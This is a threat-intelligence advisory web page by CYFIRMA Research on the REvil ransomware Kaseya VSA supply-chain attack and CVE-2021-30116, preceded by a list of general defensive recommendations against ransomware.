  1. Patch the CVE-2021-26084 vulnerability.
  2. Implement complex password policy with multi-factor authentication and renewal on regular intervals.
  3. Protect email accounts with multi-factor authentication and be careful when opening email attachments or clicking on embedded links.
  4. Enforce multi-factor authentication (MFA) for all logins and place all Remote Desktop servers (RDP) behind Virtual private networks (VPN).
  5. Regularly update all software on all systems and networks and other devices and turn on automatic update if possible.
  6. Implement Role-Based access policy and restrict it to minimal as per the requirement.
  7. Ensure the segmentation of the network/user resources such that the number of resources that an intruder can control is restricted.
  8. Implement an Internal threat management policy that includes, train and educate employees about the latest threats and ransomware attacks and how to behave in such scenarios.
  9. Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  10. Restrict to click or open suspicious/unauthorized links and files, specifically on organization devices.
  11. Must implement regular back-ups policy, more than one back-up and kept one on a separate network and other isolated offline at a different place.
  12. Consider Runtime Application Self Protection (RASP) and other client-side protection tools.
  13. Use IDS/IPS, firewall, and antivirus/anti-spam/anti-ransomware and anti-malware solutions.
  14. Ensure preparedness for ransomware attacks by constructing a pre-incident preparation strategy, that includes backup, asset management, and the restriction of user privileges.
  15. Regular audits are necessary from a third party.
  16. Regular vulnerability assessment and patching policy.

 

 

Kaseya Supply Chain Attacks

By CYFIRMA Research

First Published on 6 August 2021

  1. EXECUTIVE SUMMARY

REvil ransomware has set a price for decrypting all systems locked during the Kaseya supply-chain attack and has exploited zero-day vulnerability CVE-2021-30116.

As several organizations, leverage Managed Service Providers (MSPs) as part of operational procedures and having third-party vendors as part of the organization’s ecosystem – they could potentially be targeted by such ransomware attackers.

The vulnerability is considered the critical one as it bypasses security mechanisms and has been exploited by cybercriminals/ransomware operators in the wild.

Based on the analysis and research carried out, CYFIRMA observed suspected Russian cybercriminals TA505 could possibly be collaborating with REvil ransomware groups or operating them to potentially exploit this vulnerability to gain access into the system, laterally move across the organization and implant customized malware to exfiltrate sensitive information.

CYFIRMA recommends using reported IOC details for measures against this campaign and threat hunting within your environment.

CYFIRMA Risk Rating for this Research is Critical.

NOTE: This is a developing story, more insights will be shared in due course as developments continue to happen. The vulnerability has been reported as situational awareness intelligence. CYFIRMA would like to highlight the potential risk and indicators observed which may be leveraged by nation-state threat actors in exploiting the vulnerability to gain a foothold and exfiltrate sensitive information from the target organizations.

  1. VULNERABILIY AT A GLANCE

Security Bypass Vulnerability in Kaseya VSA Servers

CVE-2021-30116

CVSS Score: 9.8

Exploit Details: This zero-day vulnerability is being exploited in the wild and has been leveraged by REvil Ransomware Group.

Description:
Kaseya VSA servers could allow a remote attacker to bypass security restrictions, caused by improper authentication validation by the web panel. By sending specially-crafted SQL commands, an attacker could exploit this vulnerability to deploy arbitrary programs to all connected clients.

Impact
Successful exploitation of the vulnerability could allow an attacker to compromise the affected system.

Insights
The vulnerability exists due to unspecified errors and could be exploited by a remote non-authenticated attacker via the Internet.

The CWE is CWE-20, and the vulnerability has an impact on confidentiality, integrity, and availability.

Affected Version
Kaseya VSA (All on-premise Kaseya VSA versions).

Mitigation
Currently, NO patch is available for this vulnerability.

Security Indicators

  • Is there already an exploit tool to attack this vulnerability? Unknown
  • Has this vulnerability already been used in an attack? Yes
  • Are hackers discussing about this vulnerability in the Deep/Dark Web? Yes
  • What is the attack complexity level? Low

 

To download the full report, write to [email protected]

This site is registered on wpml.org as a development site. Switch to a production site key to remove this banner.